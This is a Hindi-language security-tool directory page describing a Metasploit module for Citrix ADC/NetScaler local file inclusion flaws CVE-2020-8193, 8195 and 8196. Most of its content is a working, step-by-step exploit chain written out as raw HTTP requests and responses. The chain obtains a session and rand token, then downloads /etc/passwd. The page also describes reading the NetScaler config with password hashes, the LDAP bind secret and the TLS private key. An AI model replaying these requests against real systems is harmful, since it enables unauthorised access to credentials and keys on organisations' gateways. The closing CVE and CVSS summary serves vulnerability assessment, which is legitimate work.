Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
citrix_adc_netscaler_lfi — यह Metasploit-Framework मॉड्यूल कंपनियों को Citrix की नवीनतम सुरक्षा कमजोरियों CVE-2020-8193, CVE-2020-8195 और CVE-2020-8196 की जाँच करने में मदद करने के लिए उपयोग किया जा सकता है (जो 08 जुलाई, 2020 को प्रकट की गईं)। | Kitploit
उपकरण/GitHubGitHub/zeop-cybersec/citrix_adc_netscaler_lfi
शोषण फ्रेमवर्कभेद्यता विश्लेषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubzeop-cybersec/citrix_adc_netscaler_lfi

citrix_adc_netscaler_lfi

यह Metasploit-Framework मॉड्यूल कंपनियों को Citrix की नवीनतम सुरक्षा कमजोरियों CVE-2020-8193, CVE-2020-8195 और CVE-2020-8196 की जाँच करने में मदद करने के लिए उपयोग किया जा सकता है (जो 08 जुलाई, 2020 को प्रकट की गईं)।

रिपॉजिटरी देखें
6436 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

citrix_adc_netscaler_lfi_scan

वैकल्पिक पाठ

यह Metasploit-Framework मॉड्यूल कंपनियों को नवीनतम Citrix कमजोरियों (08 जुलाई, 2020 को खुलासा) की जांच करने में मदद करने के लिए उपयोग किया जा सकता है।

  • CVE-2020-8193
  • CVE-2020-8195
  • CVE-2020-8196

Donny Maasland द्वारा 8 जुलाई, 2020 को सार्वजनिक रिपोर्टिंग में चर्चा की गई थी कि कमजोरी का शोषण कैसे किया जा सकता है।

10 जुलाई तक, RIFT ने पुष्टि की है कि इस कमजोरी का उपयोग कमजोर इंस्टेंस से मान्य VPN सत्र निकालने के लिए किया जा सकता है।

Twitter से अधिक पढ़ें:

  • Citrix Issues Critical Patches for 11 New Flaws Affecting Multiple Products
  • Hackers Actively Scanning & Constantly Attempt To Exploit Citrix ADC Vulnerabilities

अनुरोध

0x1 create_session (प्रारंभ)

सबसे पहले, आपको सत्र आईडी प्राप्त करने की आवश्यकता है।

root@kitploit:~
POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: 192.168.7.2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
X-NITRO-USER: LCGSfX
X-NITRO-PASS: fYiZon
Content-Type: application/xml
Content-Length: 44
Connection: close

<appfwprofile><login></login></appfwprofile>
root@kitploit:~
HTTP/1.1 406 Not Acceptable
Date: Tue, 14 Jul 2020 09:13:23 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Set-Cookie: SESSID=b4f86e3ab3df3f666eaf0b618502a7b5; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-XSS-Protection: 1; mode=block
Content-Length: 4489
Connection: close
Content-Type: application/xml; charset=utf-8

0x2 fix_session_rand

फिर, आपको सत्र को ठीक करने की आवश्यकता है। आप इस चरण का लाभ उठाकर rand मान प्राप्त कर सकते हैं (और /menu/stc के लिए एक अतिरिक्त अनुरोध से बच सकते हैं)।

root@kitploit:~
GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1
Host: 192.168.7.2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: SESSID=b4f86e3ab3df3f666eaf0b618502a7b5;
Content-Type: application/x-www-form-urlencoded
Connection: close
root@kitploit:~
HTTP/1.1 302 Found
Date: Tue, 14 Jul 2020 09:13:27 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: is_cisco_platform=0; expires=Fri, 09-Jul-2021 09:13:27 GMT; Max-Age=31104000; path=/; HttpOnly
Location: /menu/neo
X-XSS-Protection: 1; mode=block
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

आपको रीडायरेक्ट का पालन करना होगा।

root@kitploit:~
GET /menu/neo HTTP/1.1
Host: 192.168.7.2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: SESSID=b4f86e3ab3df3f666eaf0b618502a7b5;
Content-Type: application/x-www-form-urlencoded
Connection: close

और प्रतिक्रिया के मुख्य भाग से rand मान प्राप्त करें।

root@kitploit:~
HTTP/1.1 200 OK
Date: Tue, 14 Jul 2020 09:13:30 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: startupapp=neo; expires=Fri, 09-Jul-2021 09:13:30 GMT; Max-Age=31104000; path=/; HttpOnly
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Content-Length: 1590
Connection: close
Content-Type: text/html;application/octet-stream;application/ecmascript;application/json;application/xml;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XDEV_HTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Citrix ADC - Configuration</title>
<script type="text/javascript">var neo_logout_url = "/menu/lo?rand=478257144.1894793017920341";</script>
<script type="text/javascript">var neo_machine_sysid = "450092";var rand = "478257144.1894793017920341";var partition_dir = "";var is_ha_supported_in_gui = "true";var login_warning = "";</script>
<script type="text/javascript">var global_data = "{global_data}";</script>
<link href="/admin_ui/rdx/core/css/rdx.css" rel="stylesheet" type="text/css"/>
<link href="/admin_ui/neo/css/neo.css" rel="stylesheet" type="text/css"/>
<!--[if IE]> <style type="text/css"> .form td input[type="submit"] { width: 50px; } </style> <![endif]-->
<script type="text/javascript" src="/admin_ui/rdx/core/js/rdx.js"></script>
<script type="text/javascript" src="/menu/branding"></script>
<script type="text/javascript" src="/menu/neoglobaldata"></script>
<script type="text/javascript" src="/menu/neoa?gui_token=478257144.1894793017920341"></script>
<script type="text/javascript" src="/admin_ui/neo/js/neo.js"></script>
<script type="text/javascript" src="/admin_ui/neo/js/epa_expression_data_win.js"></script>
<script type="text/javascript" src="/admin_ui/neo/js/epa_expression_data_mac.js"></script>
</head>
<body class="ns_body">
</body>
</html>

0x3 create_session (तोड़ना)

root@kitploit:~
POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: 192.168.7.2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: SESSID=b4f86e3ab3df3f666eaf0b618502a7b5;
X-NITRO-USER: PjdFbLCc
X-NITRO-PASS: xyFoLmXD
Content-Type: application/xml
Content-Length: 44
Connection: close

<appfwprofile><login></login></appfwprofile>
root@kitploit:~
HTTP/1.1 406 Not Acceptable
Date: Tue, 14 Jul 2020 09:13:33 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-XSS-Protection: 1; mode=block
Content-Length: 4489
Connection: close
Content-Type: application/xml; charset=utf-8

0x4 read_lfi

root@kitploit:~
POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1
Host: 192.168.7.2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: SESSID=b4f86e3ab3df3f666eaf0b618502a7b5;
X-NITRO-USER: UGjkHm
X-NITRO-PASS: NbIEBHxw
rand_key: 478257144.1894793017920341
Content-Type: application/xml
Content-Length: 31
Connection: close

<clipermission></clipermission>
root@kitploit:~
HTTP/1.1 406 Not Acceptable
Date: Tue, 14 Jul 2020 09:13:37 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: -1
Cache-Control: private, must-revalidate, post-check=0, pre-check=0
Pragma: private
Content-Disposition: attachment;filename="passwd"
Accept-Ranges: bytes
Content-Length: 465
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: application/octet-stream

root:*:0:0:Charlie &:/root:/usr/bin/bash
nsroot:*:0:0:Netscaler Root:/root:/netscaler/nssh
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
nsmonitor:*:65532:65534:Netscaler Monitoring user:/var/nstmp/monitors:/usr/sbin/nologin

शोषण विकास और प्रभाव

एक हमलावर इस कमजोरी का लाभ उठाकर कमजोर Citrix सिस्टम पर संवेदनशील जानकारी प्राप्त कर सकता है।

Citrix Netscaler 12.1 build 55.18 पर हमने जो देखा, उसका एक छोटा सा अवलोकन:

  • /nsconfig/ns.conf पढ़ने की संभावना:

यह Netscaler के लिए कॉन्फ़िगरेशन फ़ाइल है। इसमें SSH में Netscaler से कनेक्ट करने के लिए अधिकृत उपयोगकर्ताओं के हैश शामिल हैं (उपयोगकर्ता nsroot सहित)। इस फ़ाइल में अन्य जानकारी भी है, जैसे कि एक Active Directory को बाँधने के लिए उपयोग की जाने वाली जानकारी (उदाहरण के लिए)।

कुछ रोचक आउटपुट:

root@kitploit:~
set system user nsroot 35b7a39540c7f42a4c85455a750fed309e506d6d83fcaae83 -encrypted -hashmethod SHA1
add authentication ldapAction 192.168.7.3_LDAP -serverIP 192.168.7.3 -serverPort 636 -ldapBase "DC=prod,DC=contoso,DC=com" -ldapBindDn [email protected] -ldapBindDnPassword 36e2fd1867ca398c68f45c7c54dfa56988c3464ff2a3acf48887091292fb58f5 -encrypted -encryptmethod ENCMTHD_3 -ldapLoginName
add ssl certKey ns-server-certificate -cert ns-server.cert -key ns-server.key

वैकल्पिक पाठ

  • /nsconfig/ssl/ns-server.key (और अन्य सभी प्रमाणपत्र फ़ाइलें) पढ़ने की संभावना:

यह TLS के लिए प्रमाणपत्र कुंजी है।

वैकल्पिक पाठ

  • /var/nstmp निर्देशिका को सूचीबद्ध करने की क्षमता:

आमतौर पर LFI से निर्देशिकाओं को सूचीबद्ध करना सामान्य नहीं है। एक हमलावर फ़ाइल सिस्टम में "अपना रास्ता खोजने" के लिए इसका उपयोग कर सकता है। /var/nstmp निर्देशिका में सक्रिय सत्रों की सूची होती है।

वैकल्पिक पाठ

कमजोर सिस्टम

CVE-2020-8193: Citrix ADC और Citrix Gateway संस्करण 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 और 10.5-70.18 से पहले, और Citrix SDWAN WAN-OP संस्करण 11.1.1a, 11.0.3d और 10.2.7 से पहले में अनुचित पहुँच नियंत्रण कुछ URL एंडपॉइंट्स तक अप्रमाणित पहुँच की अनुमति देता है।

CVSS 3.x गंभीरता और मीट्रिक:

  • आधार स्कोर: 6.5 (मध्यम)
  • वेक्टर: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

CVE-2020-8195: Citrix ADC और Citrix Gateway संस्करण 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 और 10.5-70.18 से पहले, और Citrix SDWAN WAN-OP संस्करण 11.1.1a, 11.0.3d और 10.2.7 से पहले में अनुचित इनपुट सत्यापन के परिणामस्वरूप निम्न-विशेषाधिकार प्राप्त उपयोगकर्ताओं को सीमित जानकारी का खुलासा होता है।

CVSS 3.x गंभीरता और मीट्रिक:

  • आधार स्कोर: 6.5 (मध्यम)
  • वेक्टर: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CVE-2020-8196: Citrix ADC और Citrix Gateway संस्करण 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 और 10.5-70.18 से पहले, और Citrix SDWAN WAN-OP संस्करण 11.1.1a, 11.0.3d और 10.2.7 से पहले में अनुचित पहुँच नियंत्रण के परिणामस्वरूप निम्न-विशेषाधिकार प्राप्त उपयोगकर्ताओं को सीमित जानकारी का खुलासा होता है।

CVSS 3.x गंभीरता और मीट्रिक:

  • आधार स्कोर: 4.3 (मध्यम)
  • वेक्टर: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
टूल डाउनलोड करें